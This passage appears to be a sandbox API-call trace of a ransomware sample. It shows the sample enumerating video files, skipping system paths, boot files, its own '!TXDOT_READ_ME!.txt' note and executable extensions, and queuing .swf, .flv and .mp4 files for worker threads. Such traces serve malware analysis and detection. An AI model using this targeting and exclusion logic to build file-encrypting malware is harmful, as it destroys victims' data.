nFileSizeHigh=0x0, nFileSizeLow=0x1143c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WxV-TMM4v.avi", cAlternateFileName="WXV-TM~1.AVI")) returned 0 [0077.087] FindClose (in: hFindFile=0xec2330 | out: hFindFile=0xec2330) returned 1 [0077.087] GetProcessHeap () returned 0xe30000 [0077.087] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed31f0 | out: hHeap=0xe30000) returned 1 [0077.087] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0xcd052f60, ftLastAccessTime.dwHighDateTime=0x1d5ee6e, ftLastWriteTime.dwLowDateTime=0xcd052f60, ftLastWriteTime.dwHighDateTime=0x1d5ee6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WlTa", cAlternateFileName="")) returned 1 [0077.087] StrCmpW (psz1="WlTa", psz2=".") returned 1 [0077.087] StrCmpW (psz1="WlTa", psz2="..") returned 1 [0077.087] StrCpyNW (in: psz1=0xed0058, psz2="C:\\Users\\FD1HVy\\Videos", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos") returned="C:\\Users\\FD1HVy\\Videos" [0077.087] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos", psz2="\\", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\") returned="C:\\Users\\FD1HVy\\Videos\\" [0077.087] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\", psz2="WlTa", cchMax=1070 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0077.087] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\system32\\") returned 0x0 [0077.087] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\syswow64\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\system\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\windows\\winsxs\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\appdata\\roaming\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\appdata\\local\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\appdata\\locallow\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\all users\\microsoft\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="\\inetpub\\logs\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\boot\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\perflogs\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\programdata\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\drivers\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\wsus\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\efstmpwp\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch=":\\$recycle.bin\\") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="crypt_detect") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="cryptolocker") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="ransomware") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="C:\\WINDOWS") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="C:\\Program Files (x86)") returned 0x0 [0077.088] StrStrIW (lpFirst="C:\\Users\\FD1HVy\\Videos\\WlTa", lpSrch="C:\\Program Files") returned 0x0 [0077.088] GetProcessHeap () returned 0xe30000 [0077.088] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b8) returned 0xed0510 [0077.088] StrCpyNW (in: psz1=0xed0510, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0077.088] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\*", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\*") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\*" [0077.089] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos\\WlTa\\*", lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0xcd052f60, ftLastAccessTime.dwHighDateTime=0x1d5ee6e, ftLastWriteTime.dwLowDateTime=0xcd052f60, ftLastWriteTime.dwHighDateTime=0x1d5ee6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2330 [0077.089] StrCmpW (psz1=".", psz2=".") returned 0 [0077.089] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0xcd052f60, ftLastAccessTime.dwHighDateTime=0x1d5ee6e, ftLastWriteTime.dwLowDateTime=0xcd052f60, ftLastWriteTime.dwHighDateTime=0x1d5ee6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.089] StrCmpW (psz1="..", psz2=".") returned 1 [0077.089] StrCmpW (psz1="..", psz2="..") returned 0 [0077.089] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43e16650, ftCreationTime.dwHighDateTime=0x1d5e96d, ftLastAccessTime.dwLowDateTime=0x24e5b230, ftLastAccessTime.dwHighDateTime=0x1d5e3d5, ftLastWriteTime.dwLowDateTime=0x24e5b230, ftLastWriteTime.dwHighDateTime=0x1d5e3d5, nFileSizeHigh=0x0, nFileSizeLow=0x441c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="2oN gpnuW1JXd5I9rz.swf", cAlternateFileName="2ONGPN~1.SWF")) returned 1 [0077.089] StrCmpW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2=".") returned 1 [0077.089] StrCmpW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="..") returned 1 [0077.089] StrCpyNW (in: psz1=0xed0510, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0077.089] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0077.089] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="2oN gpnuW1JXd5I9rz.swf", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf" [0077.089] PathFindExtensionW (pszPath="2oN gpnuW1JXd5I9rz.swf") returned=".swf" [0077.089] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0077.089] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="bootsect.bak") returned -1 [0077.089] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="iconcache.db") returned -1 [0077.089] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="thumbs.db") returned -1 [0077.089] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2=" ransomware ") returned 1 [0077.089] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2=" ransom ") returned 1 [0077.089] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="debug.txt") returned -1 [0077.089] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="boot.ini") returned -1 [0077.089] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="desktop.ini") returned -1 [0077.090] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="autorun.inf") returned -1 [0077.090] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="ntuser.dat") returned -1 [0077.090] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="ntldr") returned -1 [0077.090] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="ntdetect.com") returned -1 [0077.090] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="bootfont.bin") returned -1 [0077.090] StrCmpIW (psz1="2oN gpnuW1JXd5I9rz.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.090] PathFindExtensionW (pszPath="2oN gpnuW1JXd5I9rz.swf") returned=".swf" [0077.090] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0077.090] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0077.090] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0077.090] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.090] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.090] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2oN gpnuW1JXd5I9rz.swf" [0077.090] SetEvent (hEvent=0x3fc) returned 1 [0077.098] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a48dba0, ftCreationTime.dwHighDateTime=0x1d5ee05, ftLastAccessTime.dwLowDateTime=0xd9522960, ftLastAccessTime.dwHighDateTime=0x1d5ebeb, ftLastWriteTime.dwLowDateTime=0xd9522960, ftLastWriteTime.dwHighDateTime=0x1d5ebeb, nFileSizeHigh=0x0, nFileSizeLow=0x17d7f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="2q3Ks4TNs0IQQ.swf", cAlternateFileName="2Q3KS4~1.SWF")) returned 1 [0077.098] StrCmpW (psz1="2q3Ks4TNs0IQQ.swf", psz2=".") returned 1 [0077.099] StrCmpW (psz1="2q3Ks4TNs0IQQ.swf", psz2="..") returned 1 [0077.099] StrCpyNW (in: psz1=0xed0510, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0077.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0077.099] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="2q3Ks4TNs0IQQ.swf", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf" [0077.099] PathFindExtensionW (pszPath="2q3Ks4TNs0IQQ.swf") returned=".swf" [0077.099] StrCmpW (psz1=".swf", psz2=".txd0t") returned -1 [0077.099] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="bootsect.bak") returned -1 [0077.099] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="iconcache.db") returned -1 [0077.099] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="thumbs.db") returned -1 [0077.099] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2=" ransomware ") returned 1 [0077.101] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2=" ransom ") returned 1 [0077.101] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="debug.txt") returned -1 [0077.110] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="boot.ini") returned -1 [0077.110] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="desktop.ini") returned -1 [0077.110] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="autorun.inf") returned -1 [0077.110] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="ntuser.dat") returned -1 [0077.110] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="ntldr") returned -1 [0077.110] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="ntdetect.com") returned -1 [0077.110] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="bootfont.bin") returned -1 [0077.110] StrCmpIW (psz1="2q3Ks4TNs0IQQ.swf", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.110] PathFindExtensionW (pszPath="2q3Ks4TNs0IQQ.swf") returned=".swf" [0077.110] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".swf") returned 0x0 [0077.110] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0077.110] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0077.110] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.110] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.111] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\2q3Ks4TNs0IQQ.swf" [0077.111] SetEvent (hEvent=0x3fc) returned 1 [0077.115] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb99a5d50, ftCreationTime.dwHighDateTime=0x1d5e6b8, ftLastAccessTime.dwLowDateTime=0x109bc870, ftLastAccessTime.dwHighDateTime=0x1d5e27a, ftLastWriteTime.dwLowDateTime=0x109bc870, ftLastWriteTime.dwHighDateTime=0x1d5e27a, nFileSizeHigh=0x0, nFileSizeLow=0x10708, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="d0y3irQ9gxE8.flv", cAlternateFileName="D0Y3IR~1.FLV")) returned 1 [0077.121] StrCmpW (psz1="d0y3irQ9gxE8.flv", psz2=".") returned 1 [0077.121] StrCmpW (psz1="d0y3irQ9gxE8.flv", psz2="..") returned 1 [0077.121] StrCpyNW (in: psz1=0xed0510, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0077.121] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0077.121] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="d0y3irQ9gxE8.flv", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv" [0077.121] PathFindExtensionW (pszPath="d0y3irQ9gxE8.flv") returned=".flv" [0077.121] StrCmpW (psz1=".flv", psz2=".txd0t") returned -1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="bootsect.bak") returned 1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="iconcache.db") returned -1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="thumbs.db") returned -1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2=" ransomware ") returned 1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2=" ransom ") returned 1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="debug.txt") returned -1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="boot.ini") returned 1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="desktop.ini") returned -1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="autorun.inf") returned 1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="ntuser.dat") returned -1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="ntldr") returned -1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="ntdetect.com") returned -1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="bootfont.bin") returned 1 [0077.121] StrCmpIW (psz1="d0y3irQ9gxE8.flv", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.121] PathFindExtensionW (pszPath="d0y3irQ9gxE8.flv") returned=".flv" [0077.121] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".flv") returned 0x0 [0077.121] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0077.121] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0077.121] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.121] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.121] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\d0y3irQ9gxE8.flv" [0077.121] SetEvent (hEvent=0x3fc) returned 1 [0077.126] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e5d300, ftCreationTime.dwHighDateTime=0x1d5e133, ftLastAccessTime.dwLowDateTime=0x883aa2b0, ftLastAccessTime.dwHighDateTime=0x1d5e113, ftLastWriteTime.dwLowDateTime=0x883aa2b0, ftLastWriteTime.dwHighDateTime=0x1d5e113, nFileSizeHigh=0x0, nFileSizeLow=0x93cc, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="r47Nb711Z06w9.mp4", cAlternateFileName="R47NB7~1.MP4")) returned 1 [0077.130] StrCmpW (psz1="r47Nb711Z06w9.mp4", psz2=".") returned 1 [0077.130] StrCmpW (psz1="r47Nb711Z06w9.mp4", psz2="..") returned 1 [0077.130] StrCpyNW (in: psz1=0xed0510, psz2="C:\\Users\\FD1HVy\\Videos\\WlTa", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa") returned="C:\\Users\\FD1HVy\\Videos\\WlTa" [0077.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa", psz2="\\", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\" [0077.130] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\", psz2="r47Nb711Z06w9.mp4", cchMax=1080 | out: psz1="C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4") returned="C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4" [0077.130] PathFindExtensionW (pszPath="r47Nb711Z06w9.mp4") returned=".mp4" [0077.130] StrCmpW (psz1=".mp4", psz2=".txd0t") returned -1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="bootsect.bak") returned 1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="iconcache.db") returned 1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="thumbs.db") returned -1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2=" ransomware ") returned 1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2=" ransom ") returned 1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="debug.txt") returned 1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="boot.ini") returned 1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="desktop.ini") returned 1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="autorun.inf") returned 1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="ntuser.dat") returned 1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="ntldr") returned 1 [0077.130] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="ntdetect.com") returned 1 [0077.131] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="bootfont.bin") returned 1 [0077.131] StrCmpIW (psz1="r47Nb711Z06w9.mp4", psz2="!TXDOT_READ_ME!.txt") returned 1 [0077.131] PathFindExtensionW (pszPath="r47Nb711Z06w9.mp4") returned=".mp4" [0077.131] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".mp4") returned 0x0 [0077.131] FileTimeToSystemTime (in: lpFileTime=0x552f19c, lpSystemTime=0x552f188 | out: lpSystemTime=0x552f188) returned 1 [0077.131] SystemTimeToTzSpecificLocalTime (in: lpTimeZoneInformation=0x0, lpUniversalTime=0x552f188, lpLocalTime=0x552f158 | out: lpLocalTime=0x552f158) returned 1 [0077.131] WaitForMultipleObjects (nCount=0x4, lpHandles=0xe9f390*=0x3f8, bWaitAll=0, dwMilliseconds=0xffffffff) returned 0x0 [0077.131] StrCpyW (in: psz1=0xea0078, psz2="\\\\?\\" | out: psz1="\\\\?\\") returned="\\\\?\\" [0077.131] StrNCatW (in: psz1="\\\\?\\", psz2="C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4", cchMax=32000 | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\WlTa\\r47Nb711Z06w9.mp4" [0077.131] SetEvent (hEvent=0x3fc) returned 1 [0077.138] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x552f198 | out: lpFindFileData=0x552f198*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb4e5d300, ftCreationTime.dwHighDateTime=0x1d5e133, ftLastAccessTime.dwLowDateTime=0x883aa2b0, ftLastAccessTime.dwHighDateTime=0x1d5e113, ftLastWriteTime.dwLowDateTime=0x883aa2b0, ftLastWriteTime.dwHighDateTime=0x1d5e113, nFileSizeHigh=0x0, nFileSizeLow=0x93cc, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="r47Nb711Z06w9.mp4", cAlternateFileName="R47NB7~1.MP4")) returned 0 [0077.138] FindClose (in: hFindFile=0xec2330 | out: hFindFile=0xec2330) returned 1 [0077.138] GetProcessHeap () returned 0xe30000 [0077.138] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0510 | out: hHeap=0xe30000) returned 1 [0077.138] FindNextFileW (in: hFindFile=0xec22f0, lpFindFileData=0x552f448 | out: lpFindFileData=0x552f448*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x91d2f950, ftCreationTime.dwHighDateTime=0x1d5ec4c, ftLastAccessTime.dwLowDateTime=0xcd052f60, ftLastAccessTime.dwHighDateTime=0x1d5ee6e, ftLastWriteTime.dwLowDateTime=0xcd052f60, ftLastWriteTime.dwHighDateTime=0x1d5ee6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="WlTa", cAlternateFileName="")) returned 0 [0077.138] FindClose (in: hFindFile=0xec22f0 | out: hFindFile=0xec22f0) returned 1 [0077.138] GetProcessHeap () returned 0xe30000 [0077.138] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed0058 | out: hHeap=0xe30000) returned 1 [0077.138] FindNextFileW (in: hFindFile=0xec25b0, lpFindFileData=0x552f6f8 | out: lpFindFileData=0x552f6f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xe5e11778, ftLastAccessTime.dwHighDateTime=0x1d5f12a, ftLastWriteTime.dwLowDateTime=0xe5e11778, ftLastWriteTime.dwHighDateTime=0x1d5f12a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0077.138] FindClose (in: hFindFile=0xec25b0 | out: hFindFile=0xec25b0) returned 1 [0077.138] GetProcessHeap () returned 0xe30000 [0077.138] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xec7e68 | out: hHeap=0xe30000) returned 1 [0077.138] FindNextFileW (in: hFindFile=0xec26f0, lpFindFileData=0x552f9a8 | out: lpFindFileData=0x552f9a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x17d53e9c, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x475e19ed, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475e19ed, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, 